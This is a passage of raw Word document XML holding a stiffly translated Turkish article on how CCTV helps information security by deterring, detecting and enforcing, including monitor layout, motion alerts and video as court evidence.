        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bilgi güvenliği çok yönlü bir süreçtir ve amaç, bilgi işlem tesisinin ve içindeki varlıkların güvenliğini sağlamaktır. Tipik olarak, bu varlıklar donanım, yazılım, veri ve insanlar olarak kategorize edilebilir, aynı zamanda bu insanların davranışlarını yöneten politika ve prosedürleri de içerir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yazılımın olası istisnasıyla, CCTV bu varlıkların birkaç cephede savunmasını sağlama yeteneğine sahiptir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E7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eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To Deter(</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Caydırmak için)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kameraların hem dahili hem de harici olarak bulunması görüş alanına girenlerin üzerinde kontrol edici bir etkiye sahiptir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aynı şekilde, bir depolama alanındaki küçük bir asma kilit, ev sahibinin evde olmadığı zamanlarda komşuların kendilerini bahçe aletlerine yardım etmesini önleyecek şekilde, kameranın merceği personelin doğru ve doğru davranışların dışında davranmasını engelleme eğilimindedir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Depolama alanı söz konusu olduğunda, kilit, içeriğe erişmek için anahtarı olanların kullanımına yönelik olduğu mesajını gönderir, ancak belirli bir hırsız için çok az direnç sunar. Aynı şekilde, CCTV kamera da benzer bir mesaj gönderir ve başka </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bir dürüst çalışanı caydırır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ç</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>izgiyi aşmak, ancak değerli varlıkları çalmaya kararlı birisini durdurmayacaktır. Politikaları ve prosedürleri ihlal etmek bilinçli bir eylem haline gelir, çünkü eylemin kendisi gözlenip kaydedilecektir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çevrede yer alan kameralarla, kolay hedef arayanlar, tıpkı çalışanlar gibi devam edecekTesiste, şirket politikalarına uygun bir şekilde davranma eğiliminde olacak ve prosedürleri.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Veri depolama cihazlarında eğitilmiş kameralarla, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gözlenmeyen cihaza fiziksel olarak erişmek zorlaşır, böylece içerisindeki verilerin çalınmasını engeller.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İzinsiz kurulum veya donanımın kaldırılması, kameraların pencereler veya kapılar gibi portalların izlenmesine izin verecek şekilde yerleştirilmesiyle büyük ölçüde engellenebilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel olarak, CCTV kameraların varlığında suç istatistikleri önemli ölçüde azaltılmıştır.</w:t>
      </w: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Pr="005B6F3F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To Detect(Tespit etmek için)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DA53A8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik uzmanı için özel bir değer, bir CCTV sisteminin tespit edilmesini sağlama yeteneğidir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir güvenlik görevlisinin gözleri, aynı anda sadece tek bir yeri gözlemleyebilir, ancak CCTV sistemleri tek bir göz çiftinin bir monitör bankasını gözleyebileceği şekilde yapılandırılabilir. Ayrıca </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Her monitör birden fazla kameranın çıkışını görüntüleyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DA53A8"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DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Net etki, korumanın sırayla tek bir gözlem noktasından düzinelerce konumu gözlemleyebilmesidir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Trafik az veya hiç olmayan dönemlerde, kamera görüntüsüne g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>iren bir kişi kolayca algılanır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kamera girişini, ekranların ortasına yüksek güvenlikli ve yüksek trafikli konumlardan yerleştirmek kapsama alanını daha da artırabilir,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>çünkü etraftaki bir monitöre görüş alanına giren bir saldırgan, dikkatin odağı monitörlerin merkezinde olmasına rağmen kolayca tespit edilebilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DA53A8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Görüntü alanını değerlendirecek teknoloji kullanılıyor; </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ve görüntünün içeriği değişirse,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Görüntünün daha fazla detayını yakalamak için bir alarm çalınabilir veya kayıt modu değiştirilebilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kayıt cihazları yardımıyla, d</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA53A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>avetsiz misafirlerin veya diğer şüpheli etkinliklerin varlığını hızlı bir şekilde belirlemek için video kaseti kayıtları hızlı ileri veya geri olarak incelenebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To Enforce(</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Zorlamak için)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B36CB"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5B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">İnsanlık görgü tanığı yakın tarihte mahkemede daha sık görüldü. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Uykusuzluk, tanığın yaşı, duygusal durum vb. Hepsi bir görgü tanığı ifadesinin geçerliliğine dayanabilir. Öte yandan, kamera yorulmaz; video kayıt cihazları bu tür insan kırılganlıklarına duyarlı değildir. Bir video izleme kaydı yasal işlemlerin sonucunu büyük ölçüde değiştirebilir</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ve jürilerin suçluluk veya masumiyetine ilişkin olarak jürileri sallama konusunda mükemmel bir geçmişe sahiptir. Genellikle, disiplin cezası bile değildir iddia edilen kanunun sanık tarafından videoya bakılmasıyla istenen,</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>bu nedenle bir yargılama veya tahkim masrafını ortadan kaldırır. Eğer yasal veya disiplin cezası gerektiren bir kasette bir eylem yakalanırsa, kaset iddiaları destekleyecek ilave kanıtların bulunmasını sağlar.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çeşitli caydırıcılık, tespit ve uygulama politikalarının ve prosedürlerin uygulanma yetenekleri ile</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">varlık kategorileri, </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CCTV, bilgi güvenliği sürecinde çok etkili bir yardım, önlemlerin ve savunmanın seçilmesinde dikkatle göz önünde bulundurulması gereken bir yardım haline geliyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
